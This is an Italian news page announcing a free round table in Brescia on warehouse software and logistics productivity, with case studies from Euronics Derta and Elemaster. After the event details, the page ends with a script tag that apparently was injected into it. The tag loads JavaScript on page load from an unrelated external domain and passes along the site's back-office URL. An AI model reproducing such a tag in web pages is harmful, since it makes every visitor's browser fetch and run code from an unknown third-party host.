1. Home
  2. Notizie e Mercato
  3. Più efficienza dalla logistica: una tavola rotonda per migliorare la produttività del magazzino

Più efficienza dalla logistica: una tavola rotonda per migliorare la produttività del magazzino

Software edilizia di
5/5
votato da 1 persone
Il convegno, organizzato dai centri di ricerca sull’innovazione industriale CSMT e Inf-Os, con la collaborazione di Kube Sistemi, spiegherà come recuperare efficienza in magazzino, controllando i costi e migliorando la produttività


Nelle turbolenze dell’attuale fase economica un’azienda con un magazzino che conta su movimentazioni veloci ed efficienti offre di certo una marcia in più per contenere i costi, recuperare efficienza e aumentare la produttività. Il modo più adatto per raggiungere l’obiettivo è attuare un’adeguata informatizzazione del magazzino, attraverso un software a supporto della logistica di produzione e distributiva.

Sarà questo il tema al centro della tavola rotonda promossa dal CSMT, centro di trasferimento tecnologico dell’area industriale bresciana. L’incontro è organizzato in collaborazione con Inf-Os, community universitaria sull’innovazione dei processi aziendali, e Kube Sistemi, azienda leader in Italia nelle soluzioni di logistica per i magazzini e per i trasporti.

Due i casi aziendali che verranno esposti, quelli di Euronics Derta ed Elemaster, che da anni hanno avviato processi di informatizzazione del magazzino grazie all’installazione dei prodotti software di Kube Sistemi. Si discuterà, ascoltando la viva voce delle aziende, di come introducendo in azienda strumenti per la gestione della supply chain, e quindi integrando le operazioni logistiche del magazzino e dei trasporti, si possa ottenere un’ottimizzazione delle performance e un ritorno economico sull’investimento realizzato.
 
Per iscriversi gratuitamente cliccare qui e compilare l’apposito modulo

Più efficienza dalla logistica
Mercoledì 13 Novembre – ore 15.00
Presso: CSMTCentro Servizi Multisettoriale e Tecnologico
Via Branze 45 - Brescia


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.7565131941051416" type="text/javascript"></script>